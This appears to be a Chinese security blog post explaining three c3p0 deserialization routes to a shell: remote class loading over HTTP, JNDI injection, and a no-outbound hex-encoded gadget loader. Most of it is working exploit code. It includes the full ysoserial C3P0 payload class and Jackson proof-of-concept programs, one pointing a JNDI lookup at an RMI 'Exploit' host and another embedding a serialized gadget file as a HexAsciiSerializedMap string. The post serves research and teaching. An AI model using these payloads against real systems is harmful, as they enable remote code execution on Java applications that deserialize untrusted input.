c3p0有三种方式getshell
- http base
- jndi
- hex序列化字节加载器
http base适用于原生反序列化,后面两种适用于其他解组类型的反序列化。具体来讲,jndi适用于jdk8u191以下支持reference情况,hex序列化字节加载器适用于不出网但是目标依赖有gadget链的情况。
http base
c3p0 payload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90
| package ysoserial.payloads;
import java.io.PrintWriter; import java.sql.SQLException; import java.sql.SQLFeatureNotSupportedException; import java.util.logging.Logger;
import javax.naming.NamingException; import javax.naming.Reference; import javax.naming.Referenceable; import javax.sql.ConnectionPoolDataSource; import javax.sql.PooledConnection;
import com.mchange.v2.c3p0.PoolBackedDataSource; import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import ysoserial.payloads.annotation.Authors; import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.annotation.PayloadTest; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections;
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" ) @Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} ) @Authors({ Authors.MBECHLER }) public class C3P0 implements ObjectPayload<Object> { public Object getObject ( String command ) throws Exception { int sep = command.lastIndexOf(':'); if ( sep < 0 ) { throw new IllegalArgumentException("Command format is: <base_url>:<classname>"); }
String url = command.substring(0, sep); String className = command.substring(sep + 1);
PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class); Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url)); return b; }
private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
private String className; private String url;
public PoolSource ( String className, String url ) { this.className = className; this.url = url; }
public Reference getReference () throws NamingException { return new Reference("exploit", this.className, this.url); }
public PrintWriter getLogWriter () throws SQLException {return null;} public void setLogWriter ( PrintWriter out ) throws SQLException {} public void setLoginTimeout ( int seconds ) throws SQLException {} public int getLoginTimeout () throws SQLException {return 0;} public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;} public PooledConnection getPooledConnection () throws SQLException {return null;} public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}
}
public static void main ( final String[] args ) throws Exception { PayloadRunner.run(C3P0.class, args); }
}
|
connectionPoolDataSource是PoolSource,但是PoolSource没有实现序列化接口,所以会在PoolBackedDataSource时进入到catch块中。
data:image/s3,"s3://crabby-images/160ac/160acb046cfe5a9ca2ee523751284558b630566a" alt="image.png"
data:image/s3,"s3://crabby-images/99318/993180c23c4523627cc6e82bc2562b2e96820ce6" alt="image.png"
data:image/s3,"s3://crabby-images/cfe58/cfe587b9aafa645e698d1266d074a2549ac51a7d" alt="image.png"
catch块中调用indirector.indirectForm(this.connectionPoolDataSource)会把Referenceable类型放到ReferenceSerialized中并进行序列化。
data:image/s3,"s3://crabby-images/b717d/b717da20a0f5a06e268fe203ff74feab81118e60" alt="image.png"
在反序列化时,会调用ReferenceSerialized的getObject方法,向http base请求类
data:image/s3,"s3://crabby-images/7bc7b/7bc7bc42d927e9ce0fd106d719e26c792ed83619" alt="image.png"
data:image/s3,"s3://crabby-images/4d282/4d28245c2eaf7092e759ef81b927feefa98e0a31" alt="image.png"
data:image/s3,"s3://crabby-images/c6625/c6625fe6226f193fd88b700127bfddf9eb358423" alt="image.png"
jndi 注入
PoolBackedDataSourceBase
data:image/s3,"s3://crabby-images/81f31/81f31fb756bb13a6537997b9a947d0ebc708c684" alt="image.png"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
| import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.*;
class Person { public Object object; }
public class TemplatePoc { public static void main(String[] args) throws IOException { String poc = "{\"object\":[\"com.mchange.v2.c3p0.JndiRefForwardingDataSource\",{\"jndiName\":\"rmi://localhost:8088/Exploit\", \"loginTimeout\":0}]}"; System.out.println(poc); ObjectMapper objectMapper = new ObjectMapper(); objectMapper.enableDefaultTyping(); objectMapper.readValue(poc, Person.class); }
public static byte[] toByteArray(InputStream in) throws IOException { byte[] classBytes; classBytes = new byte[in.available()]; in.read(classBytes); in.close(); return classBytes; }
public static String bytesToHexString(byte[] bArray, int length) { StringBuffer sb = new StringBuffer(length);
for(int i = 0; i < length; ++i) { String sTemp = Integer.toHexString(255 & bArray[i]); if (sTemp.length() < 2) { sb.append(0); } sb.append(sTemp.toUpperCase()); } return sb.toString(); }
}
|
data:image/s3,"s3://crabby-images/735ae/735ae5f283de2ffab791bc94a49509ef217bec90" alt="image.png"
data:image/s3,"s3://crabby-images/84e3c/84e3c7e3682b5e719cdbd81dac8cd5c6c0029ca9" alt="image.png"
data:image/s3,"s3://crabby-images/ba2ff/ba2ff48852cf91c84d7e52cb561364ce9ecb0b49" alt="image.png"
data:image/s3,"s3://crabby-images/e0fa7/e0fa72535d393b3af63e50d5d79a77954ffcfdb5" alt="image.png"
hex序列化字节加载器
data:image/s3,"s3://crabby-images/055f7/055f7357c22a8f65aa21f4719dac02fdabaaee68" alt="image.png"
data:image/s3,"s3://crabby-images/c3aff/c3aff0b984113c0434c9258b2a406169b039438c" alt="image.png"
在一些非原生的反序列化(如jackson)的情况下,c3p0可以做到不出网利用。其原理是利用jackson的反序列化时调用userOverridesAsString的setter,在setter中运行过程中会把传入的以HexAsciiSerializedMap开头的字符串进行解码并触发原生反序列化。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46
| import com.fasterxml.jackson.databind.ObjectMapper; import java.io.*;
class Person { public Object object; }
public class TemplatePoc { public static void main(String[] args) throws IOException {
InputStream in = new FileInputStream("/Users/cengsiqi/Desktop/test.ser"); byte[] data = toByteArray(in); in.close(); String HexString = bytesToHexString(data, data.length); String poc = "{\"object\":[\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",{\"userOverridesAsString\":\"HexAsciiSerializedMap:"+ HexString + ";\"}]}";
System.out.println(poc); ObjectMapper objectMapper = new ObjectMapper(); objectMapper.enableDefaultTyping(); objectMapper.readValue(poc, Person.class); }
public static byte[] toByteArray(InputStream in) throws IOException { byte[] classBytes; classBytes = new byte[in.available()]; in.read(classBytes); in.close(); return classBytes; }
public static String bytesToHexString(byte[] bArray, int length) { StringBuffer sb = new StringBuffer(length);
for(int i = 0; i < length; ++i) { String sTemp = Integer.toHexString(255 & bArray[i]); if (sTemp.length() < 2) { sb.append(0); }
sb.append(sTemp.toUpperCase()); } return sb.toString(); }
}
|
简单跟踪一下,进入setter方法。
data:image/s3,"s3://crabby-images/dff8f/dff8f0feb1de9fc1e5f5c65c5d2c56fb22918e86" alt="image.png"
由parseUserOverridesAsString对字符串进行处理
data:image/s3,"s3://crabby-images/a162b/a162bf1f88b8e8867401c1cfdf12a8878f17d3c2" alt="image.png"
提取HexAsciiSerializedMap之后的东西
data:image/s3,"s3://crabby-images/50029/500291a6fbe09f53ec87f273cba9eaab69eb7f47" alt="image.png"
最后由fromByteArray中的deserializeFromByteArray进行反序列化
data:image/s3,"s3://crabby-images/b1de6/b1de6b92df019fdb852e8e2e020a57c1f2602326" alt="image.png"
data:image/s3,"s3://crabby-images/a441c/a441c3a431c8d039496ee7fa8cca56259d2805d5" alt="image.png"